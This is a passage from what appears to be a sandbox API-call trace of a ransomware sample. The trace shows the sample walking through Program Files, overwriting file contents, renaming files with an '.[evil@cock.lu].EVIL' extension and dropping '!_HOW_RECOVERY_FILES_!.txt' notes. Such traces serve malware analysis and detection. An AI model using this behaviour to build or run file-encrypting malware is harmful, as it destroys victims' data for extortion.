Files\\System\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.055] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0090.055] __uncaught_exception () returned 0x84b1160800 [0090.055] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.056] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0090.056] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0090.056] wcslen (_String="C:\\\\Program Files\\Common Files") returned 0x1e [0090.056] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.056] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.056] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.056] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0090.056] __uncaught_exception () returned 0x84b1160800 [0090.056] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.057] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0090.057] wcsstr (_Str="desktop.ini", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.057] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\desktop.ini") returned 29 [0090.057] wcscmp (_String1="desktop.ini", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.057] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="desktop.ini") returned 0x0 [0090.057] wcslen (_String="C:\\\\Program Files\\desktop.ini") returned 0x1d [0090.057] CreateFileW (lpFileName="C:\\\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0090.058] ReadFile (in: hFile=0x17c, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdec20, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdec20*=0xae, lpOverlapped=0x0) returned 1 [0090.060] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0090.061] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0090.061] _errno () returned 0x84b1160840 [0090.061] SetFilePointer (in: hFile=0x17c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.061] WriteFile (in: hFile=0x17c, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x84b0fdec20, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdec20*=0xc0, lpOverlapped=0x0) returned 1 [0090.061] CloseHandle (hObject=0x17c) returned 1 [0090.061] _wfsopen (_FileName="C:\\\\Program Files\\desktop.ini", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.061] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0090.061] __uncaught_exception () returned 0x84b1160800 [0090.061] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.061] MoveFileW (lpExistingFileName="C:\\\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini"), lpNewFileName="C:\\\\Program Files\\desktop.ini.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\desktop.ini.[evil@cock.lu].evil")) returned 1 [0090.258] ??_V@YAXPEAX@Z () returned 0x1 [0090.262] SetFileAttributesW (lpFileName="C:\\\\Program Files\\desktop.ini", dwFileAttributes=0x0) returned 0 [0090.262] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0090.262] wcsstr (_Str="Internet Explorer", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.262] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer") returned 35 [0090.262] wcscmp (_String1=".", _String2="Internet Explorer") returned -1 [0090.262] wcscmp (_String1="..", _String2="Internet Explorer") returned -1 [0090.262] wcslen (_String="C:\\\\Program Files\\Internet Explorer") returned 0x23 [0090.262] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Internet Explorer" | out: _Destination="C:\\\\Program Files\\Internet Explorer") returned 0x0 [0090.262] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\*") returned="C:\\\\Program Files\\Internet Explorer\\*" [0090.262] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Internet Explorer\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0090.263] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.263] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\.") returned 37 [0090.263] wcscmp (_String1=".", _String2=".") returned 0 [0090.263] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0090.263] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.263] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\..") returned 38 [0090.263] wcscmp (_String1=".", _String2="..") returned -1 [0090.263] wcscmp (_String1="..", _String2="..") returned 0 [0090.263] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0090.263] wcsstr (_Str="en-US", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.263] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\en-US") returned 41 [0090.263] wcscmp (_String1=".", _String2="en-US") returned -1 [0090.263] wcscmp (_String1="..", _String2="en-US") returned -1 [0090.263] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\en-US") returned 0x29 [0090.263] wcscpy_s (in: _Destination=0x84b0fde690, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Internet Explorer\\en-US" | out: _Destination="C:\\\\Program Files\\Internet Explorer\\en-US") returned 0x0 [0090.263] wcscat (in: _Dest=0x84b0fde690, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\en-US\\*") returned="C:\\\\Program Files\\Internet Explorer\\en-US\\*" [0090.263] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Internet Explorer\\en-US\\*", lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0x84b11ddce0 [0090.264] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.264] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\en-US\\.") returned 43 [0090.264] wcscmp (_String1=".", _String2=".") returned 0 [0090.264] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.264] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.264] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\en-US\\..") returned 44 [0090.264] wcscmp (_String1=".", _String2="..") returned -1 [0090.264] wcscmp (_String1="..", _String2="..") returned 0 [0090.264] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.264] wcsstr (_Str="hmmapi.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.264] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui") returned 56 [0090.264] wcscmp (_String1="hmmapi.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.264] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="hmmapi.dll.mui") returned 0x0 [0090.264] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui") returned 0x38 [0090.264] CreateFileW (lpFileName="C:\\\\Program Files\\Internet Explorer\\en-US\\hmmapi.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\hmmapi.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.264] GetLastError () returned 0x5 [0090.264] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.264] wcsstr (_Str="ieinstal.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.264] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui") returned 58 [0090.264] wcscmp (_String1="ieinstal.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.264] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ieinstal.exe.mui") returned 0x0 [0090.264] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui") returned 0x3a [0090.265] CreateFileW (lpFileName="C:\\\\Program Files\\Internet Explorer\\en-US\\ieinstal.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\ieinstal.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.265] GetLastError () returned 0x5 [0090.265] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.265] wcsstr (_Str="iexplore.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.265] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui") returned 58 [0090.265] wcscmp (_String1="iexplore.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.265] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="iexplore.exe.mui") returned 0x0 [0090.265] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui") returned 0x3a [0090.265] CreateFileW (lpFileName="C:\\\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.268] GetLastError () returned 0x5 [0090.268] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0 [0090.268] FindClose (in: hFindFile=0x84b11ddce0 | out: hFindFile=0x84b11ddce0) returned 1 [0090.268] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\en-US") returned 0x29 [0090.268] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.268] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.268] _wfsopen (_FileName="C:\\\\Program Files\\Internet Explorer\\en-US\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.271] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0090.271] __uncaught_exception () returned 0x84b1160800 [0090.271] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.272] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0090.272] wcsstr (_Str="hmmapi.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.272] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\hmmapi.dll") returned 46 [0090.272] wcscmp (_String1="hmmapi.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.272] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="hmmapi.dll") returned 0x0 [0090.272] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\hmmapi.dll") returned 0x2e [0090.272] CreateFileW (lpFileName="C:\\\\Program Files\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.272] GetLastError () returned 0x5 [0090.273] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0090.273] wcsstr (_Str="iediagcmd.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.273] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\iediagcmd.exe") returned 49 [0090.273] wcscmp (_String1="iediagcmd.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.273] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="iediagcmd.exe") returned 0x0 [0090.273] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\iediagcmd.exe") returned 0x31 [0090.273] CreateFileW (lpFileName="C:\\\\Program Files\\Internet Explorer\\iediagcmd.exe" (normalized: "c:\\program files\\internet explorer\\iediagcmd.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.273] GetLastError () returned 0x5 [0090.273] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0090.273] wcsstr (_Str="ieinstal.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.273] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\ieinstal.exe") returned 48 [0090.273] wcscmp (_String1="ieinstal.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.273] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ieinstal.exe") returned 0x0 [0090.273] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\ieinstal.exe") returned 0x30 [0090.273] CreateFileW (lpFileName="C:\\\\Program Files\\Internet Explorer\\ieinstal.exe" (normalized: "c:\\program files\\internet explorer\\ieinstal.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.273] GetLastError () returned 0x5 [0090.273] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0090.273] wcsstr (_Str="ielowutil.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.274] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\ielowutil.exe") returned 49 [0090.274] wcscmp (_String1="ielowutil.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.274] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ielowutil.exe") returned 0x0 [0090.274] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\ielowutil.exe") returned 0x31 [0090.274] CreateFileW (lpFileName="C:\\\\Program Files\\Internet Explorer\\ielowutil.exe" (normalized: "c:\\program files\\internet explorer\\ielowutil.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.274] GetLastError () returned 0x5 [0090.274] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0090.274] wcsstr (_Str="IEShims.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.274] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\IEShims.dll") returned 47 [0090.274] wcscmp (_String1="IEShims.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.274] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IEShims.dll") returned 0x0 [0090.274] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\IEShims.dll") returned 0x2f [0090.275] CreateFileW (lpFileName="C:\\\\Program Files\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files\\internet explorer\\ieshims.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.275] GetLastError () returned 0x5 [0090.275] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0090.275] wcsstr (_Str="iexplore.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.275] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\iexplore.exe") returned 48 [0090.275] wcscmp (_String1="iexplore.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.275] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="iexplore.exe") returned 0x0 [0090.275] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\iexplore.exe") returned 0x30 [0090.275] CreateFileW (lpFileName="C:\\\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.275] GetLastError () returned 0x5 [0090.275] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0090.275] wcsstr (_Str="images", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.275] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\images") returned 42 [0090.275] wcscmp (_String1=".", _String2="images") returned -1 [0090.275] wcscmp (_String1="..", _String2="images") returned -1 [0090.275] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\images") returned 0x2a [0090.275] wcscpy_s (in: _Destination=0x84b0fde690, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Internet Explorer\\images" | out: _Destination="C:\\\\Program Files\\Internet Explorer\\images") returned 0x0 [0090.275] wcscat (in: _Dest=0x84b0fde690, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\images\\*") returned="C:\\\\Program Files\\Internet Explorer\\images\\*" [0090.275] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Internet Explorer\\images\\*", lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0x84b11ddaa0 [0090.276] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.276] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\images\\.") returned 44 [0090.276] wcscmp (_String1=".", _String2=".") returned 0 [0090.276] FindNextFileW (in: hFindFile=0x84b11ddaa0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.276] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.276] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\images\\..") returned 45 [0090.276] wcscmp (_String1=".", _String2="..") returned -1 [0090.276] wcscmp (_String1="..", _String2="..") returned 0 [0090.276] FindNextFileW (in: hFindFile=0x84b11ddaa0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.276] wcsstr (_Str="bing.ico", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.276] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\images\\bing.ico") returned 51 [0090.276] wcscmp (_String1="bing.ico", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.276] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bing.ico") returned 0x0 [0090.276] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\images\\bing.ico") returned 0x33 [0090.276] CreateFileW (lpFileName="C:\\\\Program Files\\Internet Explorer\\images\\bing.ico" (normalized: "c:\\program files\\internet explorer\\images\\bing.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.276] GetLastError () returned 0x5 [0090.276] FindNextFileW (in: hFindFile=0x84b11ddaa0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0 [0090.276] FindClose (in: hFindFile=0x84b11ddaa0 | out: hFindFile=0x84b11ddaa0) returned 1 [0090.276] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\images") returned 0x2a [0090.276] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.277] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.277] _wfsopen (_FileName="C:\\\\Program Files\\Internet Explorer\\images\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.277] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0090.277] __uncaught_exception () returned 0x84b1160800 [0090.277] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.278] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0090.278] wcsstr (_Str="SIGNUP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.278] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\SIGNUP") returned 42 [0090.278] wcscmp (_String1=".", _String2="SIGNUP") returned -1 [0090.278] wcscmp (_String1="..", _String2="SIGNUP") returned -1 [0090.278] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\SIGNUP") returned 0x2a [0090.278] wcscpy_s (in: _Destination=0x84b0fde690, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Internet Explorer\\SIGNUP" | out: _Destination="C:\\\\Program Files\\Internet Explorer\\SIGNUP") returned 0x0 [0090.278] wcscat (in: _Dest=0x84b0fde690, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\SIGNUP\\*") returned="C:\\\\Program Files\\Internet Explorer\\SIGNUP\\*" [0090.279] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Internet Explorer\\SIGNUP\\*", lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0x84b11dd380 [0090.279] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.279] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\SIGNUP\\.") returned 44 [0090.279] wcscmp (_String1=".", _String2=".") returned 0 [0090.279] FindNextFileW (in: hFindFile=0x84b11dd380, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.279] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.279] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\SIGNUP\\..") returned 45 [0090.279] wcscmp (_String1=".", _String2="..") returned -1 [0090.279] wcscmp (_String1="..", _String2="..") returned 0 [0090.279] FindNextFileW (in: hFindFile=0x84b11dd380, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.279] wcsstr (_Str="install.ins", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.279] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 54 [0090.279] wcscmp (_String1="install.ins", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.279] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="install.ins") returned 0x0 [0090.279] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 0x36 [0090.279] CreateFileW (lpFileName="C:\\\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0090.282] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x1d4, lpOverlapped=0x0) returned 1 [0090.284] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0090.284] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0090.284] _errno () returned 0x84b1160840 [0090.284] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.285] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x1e0, 